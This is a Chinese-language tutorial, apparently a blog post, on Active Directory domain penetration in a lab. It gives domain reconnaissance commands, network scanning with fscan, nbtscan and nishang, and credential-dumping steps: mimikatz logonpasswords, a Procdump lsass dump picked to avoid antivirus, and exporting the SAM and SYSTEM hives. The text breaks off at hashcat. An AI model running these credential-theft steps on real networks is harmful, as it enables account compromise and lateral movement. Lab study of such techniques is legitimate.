内网渗透-初探域渗透

环境

环境搭建 ：
https://blog.youkuaiyun.com/weixin_60521036/article/details/142961251

搭建完成后使用域控制器下发文件，测试环境是否正常。

1.域控主机中新建共享文件夹

2.找到组策略管理

3.找到Default Domain Policy右键编辑

4.找到：用户配置->首选项->Windows设置->文件

5.空白处右键新建文件

6.源文件是你域控主机的文件位置，目标文件就是要分发下去的其他机器。

7.找到共享文件
我这里共享文件夹放了一个fscan，作为共享文件分发下去。

注意这里不能直接目录选择fscan文件，而是一定要选择共享文件夹中的路径，然后添加上文件夹中你要下发的文件。

然后目标文件就选择变量，分发到各自机子的桌面上

%USERPROFILE%\desktop\fscan.exe

确定后，建议强制更新一下，因为服务器默认更新组策略时间为5分钟，客户端电脑默认更新组策略时间为90分钟。

gpupdate /force

客户端这边检查桌面还是为空，是因为需要你gpupdate /force强制更新，或者可以选择注销重新登录

分发成功，域环境OK。

补：dc域控定下这么一个分发规则后，就算你是创建新用户，在新用户桌面准备好后都会给你分发这么一个东西给你，所以说这也反映了域控主机是十分重要的。

域信息收集

系统基本信息

拿下每一台机器最好都将这些系统信息收集起来，有时候会有意想不到的惊喜。

systeminfo #详细信息
net start #服务
tasklist #进程列表
tasklist /svc 进程以及对应服务
schtasks #计划任务

网络信息

ipconfig /all #能看到域名
netstat -ano #ip连接、端口开放情况
网段扫描：工具和方式太多了，省略介绍，哪个方式用着习惯用哪个

域控主机信息

net view /domain #查看主域名，不存在域环境会报错
nslookup 域名 #定位域控DC的ip，这里有了域名后也可以ping域控主机的整体域名找到DC的ip

域控主机名

nltest /dsgetdc:域名 #查看域控主机名
net time /domain #判断主域DC：回显->主机名.主域名

根据ip查主机名

#windows系统命令
nbtstat -A ip

用户信息

whoami /all #主要看权限，还有其他信息比如SID
whoami /user #针对当前用户只查看SID
net config workstation #主要看你当前登录的信息（主机名、域名、用户名等等）
net user #本地用户有哪些
net user /domain #域环境的用户信息
net localgroup #本地用户组
net group /domain  #域环境用户组
wmic useraccount get /all #域/本地用户详细信息(useraccount参数不用改)
net group "domain admins" /domain  #查看域管理组的用户信息
net group "domain users" /domain   #查看普通域的用户信息

权限提升

往期文章（提权 | Windows系统）：
https://blog.youkuaiyun.com/weixin_60521036/article/details/143187444

网络探针

系统命令

ping扫网段

for /L %I in (1,1,254) DO @ping -w 1 -n 1 10.0.0.%I | findstr "TTL="

nbtscan

老牌工具扫网段，结果还有标出DC的ip

nbtscan.exe 10.0.0.0/24

fscan

项目地址：
https://github.com/shadow1ng/fscan
工具很强大，不做详细介绍，我这里就探测一下网段，就默认开启全部模块了。

fscan.exe -h 10.0.0.0/24

nishang

这个工具使用的是powershell，个人用的比较多

项目地址：
https://github.com/samratashok/nishang

使用脚本之前先进行以下设置，每一次都要进行设置

#设置执行策略
Windows+R
输入PowerShell
运行：Set-ExecutionPolicy -Scope CurrentUser
出现ExecutionPolicy: 填入RemoteSigned
(注明：同理你要设置Bypass的话就改为将RemoteSigned改为Bypass)
输入Y
关闭PowerShell ，重新打开powershell然后执行get-ExecutionPolicy，发现变成了RemoteSigned，就成功了

#导入模块 nishang
#记得cd进入目录中才能导入nishang.psm1文件
#导入报错不要惊，后续你能获取到nishang的命令函数就代表你导入成功了
Import-Module .\nishang.psm1

#获取模块nishang的命令函数
Get-Command -Module nishang

介绍两种用法，更多用法自行查看项目的原readme.md

#获取常规计算机信息
Get-Information
#端口扫描(查看目录对应文件有演示语法、其他同理)
Invoke-PortScan -StartAddress 10.0.0.1 -EndAddress 10.0.0.100 -ResolveHost -ScanPort

下面是命令执行的一些截图

凭据收集

这里获取凭证意思是包含：各种明文口令、密文hash口令、本地TGT票据、历史TGT票据等等。

下面实战部分详解<凭据收集>

域渗透实战

前提说明：域内机器相关信息如下

域管理员：
	administrator/Domain2024!
普通域用户：
	User001/Domain2024!
	nu/abc_123456

凭据收集(重点)

这里和往期内容内网渗透-内网信息收集(一)中的抓本地密码有重复：
https://blog.youkuaiyun.com/weixin_60521036/article/details/142964820

下面我就忽略重复内容，介绍平时域渗透中用的比较多的能够拿到凭据的工具以及使用方式。

mimikatz

项目地址：
https://github.com/gentilkiwi/mimikatz

前提：需要管理员权限才能收集

privilege::debug  #进入debug模式
sekurlsa::logonpasswords  #获取密码

或者你要将结果输出到key.txt文件中
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > key.txt

Procdump

官网下载：
https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

条件

管理员权限运行

这个需要配合mimikatz解析密码，好处就是Procdump是微软自带，不会被杀掉，所以我们可以线上先导出lsass.dmp，然后放到本地mimkatz去解析获取密码

#导出lsass数据
Procdump.exe -accepteula -ma lsass.exe lsass.dmp

#mimikatz分析lsass数据
mimikatz.exe 
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
#或者也一口气输出内容到key.txt文件中
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit" > key.txt

Pwdump

工具官网下载：
https://www.openwall.com/passwords/windows-pwdump

条件

需要管理员权限运行

这里要用哪个版本就要看你在哪个版本系统上用了，官网有说明软件版本对应windows系统版本的

这个就很直接了，运行程序就输出对应账密，但都是hash，可以去在线网站破解，破解不了也没关系，后面我们也能够拿着hash值横向传递。

SAMInside

1.目标服务器导出SAM和SYSTEM或SYSKEY文件

2.通常是不能直接导出的，所以最好是通过命令窗口导出指定位置

reg save hklm\sam C:/sam
reg save hklm\system C:/system.key
reg save hklm\security C:/security

3.然后打开SAMInside选择导入

导入顺序：sam->system.key->security

导入后按解密即可，能解出来就OK，不能的话换一种方式，这种我也没成功过

krbtgt用户hash

往下看，在票据传递部分讲解如何获取

hash破解

1.在线网站

https://www.cmd5.com/

---

2.hashcat

项目地址：
https://github.com/hashcat/hashcat

hashcat -a